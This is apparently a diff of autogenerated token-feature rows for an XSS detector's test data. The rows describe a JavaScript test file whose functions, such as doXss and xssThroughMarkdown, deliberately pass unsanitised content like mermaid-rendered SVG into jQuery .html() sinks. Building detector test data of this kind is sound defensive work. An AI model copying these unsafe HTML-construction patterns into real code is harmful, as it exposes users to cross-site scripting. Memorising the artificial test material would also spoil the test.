constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | mermaid ... \\n }) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | mermaid ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | mermaid ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | mermaid ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:13:105:18 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:13:105:18 | render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:13:105:18 | render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:13:105:18 | render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:13:105:18 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:20:105:23 | "id" | CalleeFlexibleAccessPath | mermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:20:105:23 | "id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:20:105:23 | "id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23489,6 +153793,21 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:26:105:26 | x | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:26:105:26 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:26:105:26 | x | receiverName | mermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:105:28 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:105:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:105:28 | this | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:105:28 | this | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:105:28 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | 'arguments' object of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | 'arguments' object of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | exceptional return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | exceptional return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | CalleeFlexibleAccessPath | mermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | InputArgumentIndex | 2 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23497,6 +153816,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | functio ... \\n } | receiverName | mermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:29:107:5 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:39:105:41 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:9 | $ | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:9 | $ | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:9 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | $("#foo") | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | exceptional return of $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:22 | $("#foo").html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:22 | $("#foo").html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:22 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | $("#foo").html(svg) | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | exceptional return of $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | exceptional return of $("#foo").html(svg) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:9:106:27 | exceptional return of $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23504,6 +153868,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:11:106:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:19:106:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:19:106:22 | html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:19:106:22 | html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:19:106:22 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:19:106:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23511,6 +153880,36 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:106:24:106:26 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:5 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:5 | $ | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:5 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:5 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | $("#foo") | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | exceptional return of $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:13 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:18 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:18 | $("#foo").html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:18 | $("#foo").html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:18 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:18 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | $("#foo ... d", x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | $("#foo ... d", x)) | contextSurroundingFunctionParameters | (x) | +| 